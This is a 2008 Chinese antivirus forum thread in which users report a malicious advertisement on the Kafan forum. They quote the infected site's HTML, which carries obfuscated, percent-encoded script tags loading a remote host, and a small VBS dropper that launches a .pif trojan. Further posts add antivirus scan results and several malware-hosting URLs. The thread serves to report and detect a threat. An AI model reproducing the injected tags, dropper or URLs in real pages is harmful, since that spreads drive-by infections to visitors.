卡饭中的广告有马

凝逸反毒

卡饭中的广告有马

http://bbs.kafan.cn/thread-334208-1-1.html
这个广告
广州奥佳塑料制品有限公司
http://www.gzaojia.com/product.asp

不小心点到 这个广告,弹出
2008-09-24 18:38:44 应用程序保护(运行应用程序)     操作:阻止
进程路径:C:\windows\System32\WScript.exe
文件路径:C:\Documents and Settings\***\Local Settings\Temp\GameeeEeee.pif

=======网页加有网马============
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>产品展厅</TITLE>
<script src=http://%61%76%65%32%2E%63%6E></script><script src=http://%61%76%65%32%2E%63%
6E></script><script src=http://%61%76%65%32%2E%63%6E></script><script src=http://%61%76%65%
32%2E%63%6E></script><script src=http://%61%76%65%32%2E%63%6E></script><script src=http://%
61%76%65%33%2E%63%6E></script>
------------
GameeeEeee.pif
Gameeeeeee.vbs
---Gameeeeeee.vbs------
'I LOVE gameee TEAM'I LOVE gameee TEAM
Set Love_gameee = CreateObject("Wscript.Shell")'I LOVE gameee TEAM
'I LOVE gameee TEAM'I LOVE gameee TEAM
Love_gameee.run ("C:\DOCUME~1\ccc1\LOCALS~1\Temp\GameeeEeee.pif")
'I LOVE gameee TEAM'I LOVE gameee TEAM
--------

xiaojinglf

脚本被小红伞拦截达十几次后。网页正常打开。

Palkia

病毒        2008-09-24  19:09:35        C:\Documents and Settings\Administrator\桌面\c.zip\GameeeEeee.pif        Win32.TrojDownloader.MnlessT.au.45056        清除成功

Nerazzurri

elric8

扫描结果 :	58%的杀软(21/36)报告发现病毒
时间 :	2008/09/24 19:31:59 (CST)

软件名称	引擎版本	病毒库版本	病毒库时间	扫描结果	时间
a-squared	4.0.0.14	2008.09.17	2008-09-17	-	1.586
AntiVir	7.8.1.34	7.0.6.204	2008-09-24	TR/Crypt.XDR.Gen	2.379
Arcavir	1.0.5	200809232143	2008-09-23	-	1.226
AVAST!	3.0.1	080923-0	2008-09-23	-	0.686
AVG	7.5.52.442	270.7.1/1688	2008-09-24	Generic11.AEIJ	1.676
BitDefender	7.60825.1790650	7.21014	2008-09-24	Generic.Malware.Sdld.29F8B888 (suspected)	3.304
CA (VET)	9.0.0.143	31.6.6103	2008-09-24	-	5.704
ClamAV	0.94	8324	2008-09-24	Trojan.OnlineGames-1517	0.004
Comodo	2.11	2.0.0.656	2008-09-24	-	0.442
CP Secure	1.1.0.715	2008.09.24	2008-09-24	-	5.885
Dr.Web	4.44.0.9170	2008.09.24	2008-09-24	DLOADER.Trojan	3.222
ewido	4.0.0.2	2008.09.24	2008-09-24	-	2.711
F-Prot	4.4.4.56	20080923	2008-09-23	W32/OnlineGames.AJ.gen!Eldorado (generic, not disinfectable)	1.037
F-Secure	5.51.6100	2008.09.24.07	2008-09-24	-	3.432
Ikarus	T3.1.01.34	2008.09.24.71519	2008-09-24	Win32.SuspectCrc	3.327
Microsoft	1.3903	2008.09.24	2008-09-24	TrojanDownloader:Win32/Dogrobot.A	4.018
mks_vir	2.01	2008.09.23	2008-09-23	-	2.526
Norman	5.93.01	5.93.00	2008-09-18	W32/Packed/FSG_2.A	5.383
nProtect	2008-09-24.00	2148988	2008-09-24	Generic.Malware.Sdld.29F8B888	4.484
Quick Heal	9.50	2008.09.24	2008-09-24	Suspicious - DNAScan	1.773
Sophos	2.78.0	4.33	2008-09-24	Mal/Behav-009	2.003
Sunbelt	3.1.1666.1	2255	2008-09-23	VIPRE.Suspicious	0.540
The Hacker	6.3.0.9	v00092	2008-09-23	-	0.853
VBA32	3.12.8.5	20080923.0958	2008-09-23	-	1.304
ViRobot	20080924	2008.09.24	2008-09-24	-	0.406
VirusBuster	4.5.11.10	10.88.5/635652	2008-09-23	-	0.843
卡巴斯基	5.5.10	2008.09.24	2008-09-24	Trojan-Dropper.Win32.Agent.xdu	0.068
安博士V3	2008.09.24.02	2008.09.24	2008-09-24	-	1.086
江民杀毒	11.0.706	2008.09.24	2008-09-24	Trojan/Agent.blbi	1.236
熊猫卫士	9.05.01	2008.09.23	2008-09-23	Suspicious file	2.203
瑞星	20.0	20.63.22.00	2008-09-24	Trojan.DL.Win32.Mnless.bes	0.905
赛门铁克	1.3.0.24	20080923.003	2008-09-23	-	0.113
趋势科技	8.700-1004	5.564.01	2008-09-23	Cryp_Bits	0.068
迈克菲	5.3.00	5390	2008-09-23	New Malware.ab	2.093
金山毒霸	2008.1.14.15	2008.9.24.17	2008-09-24	Win32.TrojDownloader.MnlessT.au.45056	0.704
飞塔	2.81-3.113	9.580	2008-09-23	PossibleThreat	0.153

注意: 就算报告发现病毒，也可能是杀软误报，请根据查毒结果自行判断

v_ww

ess3.0
E:\Sandbox\wei\virus\user\current\桌面\c.zip > ZIP > GameeeEeee.pif - 未查明的 NewHeur_PE 病毒

BING126

McAfee                New Malware.ab

tanlimo

http://www.zmjjjyy.cn/new/a1.css
http://down.hs7yue.cn/new/a4.css
http://down.hs7yue.cn/down/ko.css


卡饭的常客了，这次终于以另一种方式进驻卡饭

尤金卡巴斯基

2008/9/24 22:29:49        已清除        木马程序 Trojan-Dropper.Win32.Agent.xdu        G:\Temp\Virus\c.zip/GameeeEeee.pif//FSG

Older

费尔狂叫！
杀！